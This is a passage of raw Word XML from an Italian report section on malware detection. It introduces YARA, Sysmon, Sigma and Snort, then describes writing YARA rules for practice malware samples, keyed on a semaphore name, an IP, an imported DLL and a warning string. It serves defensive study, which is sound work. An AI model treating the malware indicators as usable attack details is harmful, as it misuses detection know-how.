      </w:r>
    </w:p>
    <w:p w14:paraId="3418ABEF" w14:textId="2BD3059F" w:rsidR="00CC2476" w:rsidRDefault="00CC2476" w:rsidP="00963324">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598B699F" wp14:editId="18FCBB7B">
            <wp:extent cx="6188659" cy="3854249"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1885339460" name="Immagine 10" descr="Immagine che contiene testo, schermata,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9460" name="Immagine 10" descr="Immagine che contiene testo, schermata, software, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId260"/>
                    <a:srcRect l="7155" r="5889" b="9126"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6199444" cy="3860966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A91AE98" w14:textId="04D026B8" w:rsidR="00C80D04" w:rsidRDefault="007B4F36" w:rsidP="00C80D04">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:ind w:left="720"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc140165832"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00C80D04">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. Malware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="49217F9F" w14:textId="39145B8A" w:rsidR="00305D99" w:rsidRDefault="00305D99" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Uno dei pilastri fondamentali della sicurezza informatica è la rilevazione dei malware. La rilevazione dei malware implica l'identificazione e la classificazione dei software malevoli, consentendo agli amministratori di sistema di adottare misure preventive o reattive adeguate per mitigare gli effetti dannosi. Questo processo richiede una combinazione di metodi tradizionali e tecnologie avanzate per individuare e analizzare gli schemi comportamentali, le firme e le caratteristiche distintive dei malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B144141" w14:textId="5D6C2916" w:rsidR="00D26661" w:rsidRDefault="00D26661" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://www.malwarebytes.com/blog/images/uploads/2017/09/yaralogo.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19712416" wp14:editId="5C20B1E2">
            <wp:extent cx="947057" cy="452354"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:docPr id="140988561" name="Immagine 11" descr="Explained: YARA rules | Malwarebytes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ed: YARA rules | Malwarebytes Lab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47057" cy="452354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D351F" w14:textId="0AAF79AC" w:rsidR="00305D99" w:rsidRDefault="00F765E1" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">YARA </w:t>
      </w:r>
      <w:r w:rsidR="00305D99">
        <w:t xml:space="preserve">è uno strumento flessibile per la rilevazione di malware e l'analisi dei file. Consente agli esperti di sicurezza di creare regole basate su modelli di stringhe o espressioni regolari per individuare i malware. Le regole YARA sono altamente personalizzabili e possono essere adattate per rilevare specifici malware o famiglie di malware correlati. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EE375" w14:textId="77777777" w:rsidR="00CC1D31" w:rsidRDefault="00CC1D31" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EEF791" w14:textId="4DDD2FA9" w:rsidR="00CC1D31" w:rsidRDefault="00CC1D31" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i.ytimg.com/vi/gsnODLm-dCY/hqdefault.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F228705" wp14:editId="056A6B87">
            <wp:extent cx="1227909" cy="263736"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
            <wp:docPr id="1583720264" name="Immagine 12" descr="What is sysmon? How do I use i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ysmon? How do I use it? - YouTube"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId262">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="34840" t="65714" r="27227" b="23426"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1363003" cy="2927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924E4F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00924E4F">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://upload.wikimedia.org/wikipedia/commons/thumb/0/0a/Unofficial_Windows_logo_variant_-_2002%E2%80%932012_%28Multicolored%29.svg/870px-Unofficial_Windows_logo_variant_-_2002%E2%80%932012_%28Multicolored%29.svg.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00924E4F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00924E4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7690D3A8" wp14:editId="21BD4872">
            <wp:extent cx="339634" cy="299912"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="692764796" name="Immagine 13" descr="Immagine che contiene Elementi grafici, Policromia, grafic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4796" name="Immagine 13" descr="Immagine che contiene Elementi grafici, Policromia, grafica, clipart&#10;&#10;Descrizione generata automaticament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7636" cy="315808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00924E4F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64933C" w14:textId="1E59B7DA" w:rsidR="00305D99" w:rsidRDefault="00305D99" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Sysmon è un servizio di monitoraggio avanzato sviluppato da Microsoft per i sistemi Windows. Fornisce una visibilità approfondita delle attività di sistema, inclusi i processi in esecuzione, le modifiche al Registro di sistema, le connessioni di rete e molto altro ancora. Sysmon consente agli amministratori di rilevare comportamenti sospetti o indicazioni di attività malevole all'interno di un sistema, facilitando così la rilevazione dei malware. Le informazioni raccolte da Sysmon possono essere integrate in strumenti di analisi e correlazione per identificare e mitigare le minacce in tempo reale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507170C3" w14:textId="77777777" w:rsidR="00305D99" w:rsidRDefault="00305D99" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2090E0" w14:textId="2674B626" w:rsidR="009F7395" w:rsidRDefault="009F7395" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://media.licdn.com/dms/image/C4D12AQFkzfpLiNUW-g/article-cover_image-shrink_600_2000/0/1608708974754?e=2147483647&amp;v=beta&amp;t=Fzw6QA9PvdTi5SMga5QOvx6aTtWa_UmQu-cV7dqHIEM" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C40DBD" wp14:editId="2BF72B49">
            <wp:extent cx="1642058" cy="645160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2056774054" name="Immagine 14" descr="SIGMA Rules &am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MA Rules &amp; Use"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId264">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4264" t="4074" r="6046" b="4039"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1718127" cy="6750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9CCAB6" w14:textId="637FEFD4" w:rsidR="00305D99" w:rsidRDefault="00305D99" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Sigma è un linguaggio di rilevamento delle minacce che offre un formato standardizzato per la descrizione delle regole di rilevazione delle minacce. Sigma semplifica l'interoperabilità tra diverse soluzioni di sicurezza e consente agli esperti di sicurezza di creare regole di rilevamento che possono essere facilmente adottate da vari strumenti di sicurezza. Sigma supporta diversi motori di rilevamento, inclusi SIEM (Security Information and Event Management) e sistemi di rilevamento delle intrusioni, consentendo una maggiore flessibilità e scalabilità nell'implementazione delle regole di rilevamento dei malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419646F" w14:textId="77777777" w:rsidR="00305D99" w:rsidRDefault="00305D99" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7980DF" w14:textId="77777777" w:rsidR="009F7395" w:rsidRDefault="009F7395" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388A8F1E" w14:textId="77777777" w:rsidR="001020FB" w:rsidRDefault="001020FB" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://upcloud.com/media/snort_logo-2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="782E98DC" wp14:editId="67A5A859">
            <wp:extent cx="1417320" cy="772445"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="701029410" name="Immagine 15" descr="How to install Snort on Ubuntu - Up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stall Snort on Ubuntu - UpClou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66222" cy="799097"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29397E51" w14:textId="6669F6A8" w:rsidR="00305D99" w:rsidRDefault="00305D99" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Snort è un sistema di rilevamento delle intrusioni in tempo reale e un sistema di prevenzione delle intrusioni basato su firme. Utilizza un'ampia gamma di regole di rilevamento per individuare i malware e gli attacchi informatici, inclusi i tentativi di exploit e le comunicazioni sospette. Snort può essere configurato per monitorare il traffico di rete in modo continuo e generare avvisi in tempo reale quando vengono rilevate attività malevole. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE146B" w14:textId="77777777" w:rsidR="008D70B7" w:rsidRDefault="008D70B7" w:rsidP="00305D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7318141E" w14:textId="57309536" w:rsidR="00FB1D35" w:rsidRDefault="00FB1D35" w:rsidP="00FB1D35">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc140165833"/>
      <w:r>
        <w:t>8.1 Yara</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="435495F2" w14:textId="4184DEAC" w:rsidR="00AD08D1" w:rsidRDefault="00AD08D1" w:rsidP="00AD08D1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analizziamo Lab01-01.dll </w:t>
      </w:r>
      <w:r w:rsidR="004E1E85">
        <w:t>per realizzare delle specifiche regole yara.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363093CE" w14:textId="2D301BB1" w:rsidR="00F6618D" w:rsidRPr="00AD08D1" w:rsidRDefault="009A33B1" w:rsidP="00AD08D1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il file creato è </w:t>
      </w:r>
      <w:hyperlink r:id="rId266" w:history="1">
        <w:r w:rsidRPr="001A0441">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>RegoleMie_Lab_01.yara</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E867199" w14:textId="16EAF4FB" w:rsidR="008D4B92" w:rsidRDefault="00FB7AA5" w:rsidP="0064753E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC4EE97" wp14:editId="370711A5">
            <wp:extent cx="4708869" cy="5198382"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1325979020" name="Immagine 1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9020" name="Immagine 16" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId267"/>
                    <a:srcRect t="1970" r="9649"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4719703" cy="5210343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E1BD23" w14:textId="77777777" w:rsidR="00931422" w:rsidRDefault="00931422" w:rsidP="00931422">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05335EAA" w14:textId="77777777" w:rsidR="008E673B" w:rsidRDefault="008E673B" w:rsidP="00931422">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C17AB06" w14:textId="77777777" w:rsidR="00A345A4" w:rsidRDefault="00CE5837" w:rsidP="00931422">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le regole per </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5837">
        <w:t>Lab01-01.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le costruiamo andando ad analizzare le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F412845" w14:textId="3B9AFF4F" w:rsidR="00A345A4" w:rsidRDefault="00CE5837" w:rsidP="00931422">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A345A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3605BFFC" wp14:editId="0DD1E912">
            <wp:extent cx="6645910" cy="2686050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2098149058" name="Immagine 17" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">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9058" name="Immagine 17" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId268"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2686050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BDCC5" w14:textId="04B0E7A9" w:rsidR="00A345A4" w:rsidRDefault="00A345A4" w:rsidP="00A345A4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B3DEFE" wp14:editId="06F8B204">
            <wp:extent cx="4669971" cy="4141100"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="105903632" name="Immagine 18" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente">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632" name="Immagine 18" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId270"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId271"/>
                    <a:srcRect l="9139" t="12909" r="13611" b="6035"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4675770" cy="4146242"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9CEF1" w14:textId="526B660F" w:rsidR="001E3F37" w:rsidRDefault="00A000E6" w:rsidP="00C403FC">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Utilizziamo come regole il nome del semaforo e l’ip</w:t>
      </w:r>
      <w:r w:rsidR="001E3F37">
        <w:t xml:space="preserve"> trovati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD671EE" w14:textId="77777777" w:rsidR="001E3F37" w:rsidRDefault="001E3F37" w:rsidP="00C403FC">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CD1F95" w14:textId="77777777" w:rsidR="00CF0DD5" w:rsidRDefault="007F6E4E" w:rsidP="00C403FC">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il Lab01-01.exe inseriamo la regola </w:t>
      </w:r>
      <w:r w:rsidR="002C2D67">
        <w:t>della dll specifica i</w:t>
      </w:r>
      <w:r w:rsidR="00DF1AB0">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="002C2D67">
        <w:t>portata</w:t>
      </w:r>
      <w:r w:rsidR="00DF1AB0">
        <w:t xml:space="preserve"> lab01-01.dll e la stringa “</w:t>
      </w:r>
      <w:r w:rsidR="00CF0DD5">
        <w:t>warning_this_will_destroy_your_machine”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3411F3" w14:textId="6E4E7A98" w:rsidR="00333C91" w:rsidRDefault="00333C91" w:rsidP="00333C91">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="068BCF20" wp14:editId="7F2488B6">
            <wp:extent cx="6645910" cy="3830955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="854493588" name="Immagine 21" descr="Immagine che contiene testo, schermata, software, Carattere&#10;&#10;Descrizione generata automaticamente">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588" name="Immagine 21" descr="Immagine che contiene testo, schermata, software, Carattere&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId272"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId273"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3830955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1337E" w14:textId="72607C79" w:rsidR="00333C91" w:rsidRPr="00333C91" w:rsidRDefault="000500D2" w:rsidP="00333C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Verifichiamo infine che le regole create funzionano correttamente.</w:t>
      </w:r>
      <w:r w:rsidR="00333C91">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A37D80" w14:textId="53C1FB73" w:rsidR="00664CB9" w:rsidRDefault="00664CB9" w:rsidP="00664CB9">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc140165834"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.2 Yara extra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="0EB3A0AF" w14:textId="77777777" w:rsidR="00664CB9" w:rsidRDefault="00664CB9" w:rsidP="00C403FC">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551DC74D" w14:textId="1A717C20" w:rsidR="00DB5A85" w:rsidRDefault="005C4784" w:rsidP="00C403FC">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il Lab01-04.exe abbiamo individuato </w:t>
      </w:r>
      <w:r w:rsidR="00DB5A85">
        <w:t>2 eseguibili malevoli e un dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9B4D7" w14:textId="38A2116B" w:rsidR="00DB5A85" w:rsidRDefault="00664CB9" w:rsidP="00C403FC">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Generiamo inoltre tramite yargen delle regole in automatico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A201BF2" w14:textId="52BBB892" w:rsidR="00A345A4" w:rsidRDefault="00664CB9" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06A48DC9" wp14:editId="200998BD">
            <wp:extent cx="6645910" cy="6155690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1238926819" name="Immagine 19" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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6819" name="Immagine 19" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId274"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="6155690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBC517" w14:textId="0531C2BA" w:rsidR="001A0441" w:rsidRDefault="001A0441" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le regole generate si possono vedere nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId276" w:history="1">
        <w:r w:rsidRPr="001A0441">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>Lab01.yar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F397C65" w14:textId="77777777" w:rsidR="001A0441" w:rsidRDefault="001A0441" w:rsidP="00A345A4">
